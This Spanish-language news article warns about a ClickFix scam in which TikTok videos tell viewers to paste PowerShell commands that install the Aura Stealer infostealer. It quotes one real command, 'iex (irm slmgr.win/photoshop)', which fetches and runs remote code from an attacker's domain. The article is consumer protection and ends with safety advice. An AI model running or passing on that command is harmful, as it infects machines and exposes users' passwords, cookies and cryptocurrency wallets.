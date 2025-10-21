Los ciberdelincuentes aprovechan la confianza y el formato rápido de TikTok para difundir instrucciones que parecen inofensivas. En los videos, los creadores muestran paso a paso cómo activar software o acceder a servicios premium, mientras piden al usuario que copie y ejecute ciertos comandos en su computadora.

Esta táctica, conocida como ClickFix, consiste en métodos de ingeniería social diseñados para manipular a los usuarios y hacer que ejecuten código malicioso por su propia cuenta.

Uno de esos comandos, por ejemplo, es [iex (irm slmgr.win/photoshop)], una línea que se ejecuta en PowerShell, la consola de comandos de Windows. Al hacerlo, el sistema se conecta con servidores remotos desde donde se descargan scripts y programas ocultos.

Dos de esos ejecutables son especialmente peligrosos: uno de ellos es una variante del ladrón de información Aura Stealer, diseñado para extraer contraseñas, cookies de sesión y hasta accesos a billeteras de criptomonedas.

Además, el malware no solo roba datos personales, sino que también puede otorgar a los atacantes acceso al sistema o dispositivo comprometido. Esto les permite manipular archivos, instalar nuevos programas o usar el dispositivo para otras actividades delictivas sin que el usuario lo note.

TikTok: cómo evitar ser estafado

Este tipo de campañas se sostiene gracias a la curiosidad y el desconocimiento técnico de muchos usuarios que, por un lado, buscan evitar pagar por licencias y, por el otro, no saben los peligros de instalar aplicaciones no oficiales o programas crackeados.

estafas1 Ciberdelitos. Preocupación por una nueva estafa virtual en TikTok.

Lo cierto es que no existen métodos legítimos para obtener software de pago de forma gratuita. Y ejecutar comandos o descargar archivos desde fuentes no verificadas puede tener consecuencias graves, como la pérdida total de datos y la exposición de información personal o financiera.

En estos casos, recomendación es clara: desconfiar de cualquier tutorial que prometa activar programas sin licencia y nunca ejecutar comandos desconocidos en tu computadora.

Y si ya lo hiciste e intentaste seguir las instrucciones de estos videos, lo ideal es cambiar todas las contraseñas y realizar un análisis completo del sistema con un antivirus actualizado.

Fuente: tn.com.ar